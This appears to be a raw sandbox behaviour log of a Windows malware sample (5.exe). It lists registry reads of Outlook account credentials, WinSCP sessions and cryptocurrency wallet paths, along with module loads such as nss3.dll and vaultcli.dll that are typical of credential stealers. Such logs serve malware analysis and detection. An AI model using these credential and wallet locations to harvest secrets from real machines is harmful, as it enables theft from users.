Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\monero-project\monero-core - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\BitcoinGold\BitcoinGold-Qt - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\BitCore\BitCore-Qt - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Litecoin\Litecoin-Qt - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\BitcoinABC\BitcoinABC-Qt - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer value_name = Version, data = 8.0.7601.17514, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = Email, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP Server, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = Email, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Password, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 value_name = Email, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary value_name = Email, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\monero-project\monero-core value_name = wallet_path, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt value_name = strDataDir, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\BitcoinGold\BitcoinGold-Qt value_name = strDataDir, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\BitCore\BitCore-Qt value_name = strDataDir, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Litecoin\Litecoin-Qt value_name = strDataDir, data = 0 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\BitcoinABC\BitcoinABC-Qt value_name = strDataDir, data = 0 False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - False 1
Fn
Module (395)
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load MSIMG32.dll base_address = 0x74060000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load WINHTTP.dll base_address = 0x74000000 True 1
Fn
Load kernel32.dll base_address = 0x76c20000 True 7
Fn
Load user32.dll base_address = 0x74f40000 True 3
Fn
Load advapi32.dll base_address = 0x74d40000 True 3
Fn
Load oleaut32.dll base_address = 0x75220000 True 1
Fn
Load gdi32.dll base_address = 0x75ad0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 4
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load crypt32.dll base_address = 0x759b0000 True 1
Fn
Load crtdll.dll base_address = 0x6c240000 True 1
Fn
Load Gdiplus.dll base_address = 0x73e20000 True 7
Fn
Load shell32.dll base_address = 0x75fd0000 True 1
Fn
Load ntdll.dll base_address = 0x77130000 True 1
Fn
Load wininet.dll base_address = 0x753d0000 True 1
Fn
Load C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\nss3.dll base_address = 0x73a90000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 1
Fn
Load kernel32 base_address = 0x0 False 1
Fn
Load kernel32 base_address = 0x76c20000 True 1
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 1
Fn
Load vaultcli.dll base_address = 0x73500000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 5
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe base_address = 0x400000 True 2
Fn
Get Handle wininet.dll base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll base_address = 0x74650000 True 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocalTime, address_out = 0x76c35aa6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessId, address_out = 0x76c5cf04 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessWorkingSetSize, address_out = 0x76cbe359 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UpdateResourceW, address_out = 0x76cc3475 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalExit, address_out = 0x76cb2d37 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DuplicateHandle, address_out = 0x76c31886 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetThreadPriorityBoost, address_out = 0x76cb43cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x76c37a2f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessIoCounters, address_out = 0x76cb3116 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSetInformation, address_out = 0x76c35651 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeAcl, address_out = 0x74d545cd True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = MapGenericMask, address_out = 0x74d67a73 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = LookupPrivilegeNameW, address_out = 0x74d81fab True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ReportEventW, address_out = 0x74d4c839 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = EnumEnhMetaFile, address_out = 0x75af5948 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetEnhMetaFileHeader, address_out = 0x75af59f0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMapperFlags, address_out = 0x75af2613 True 1
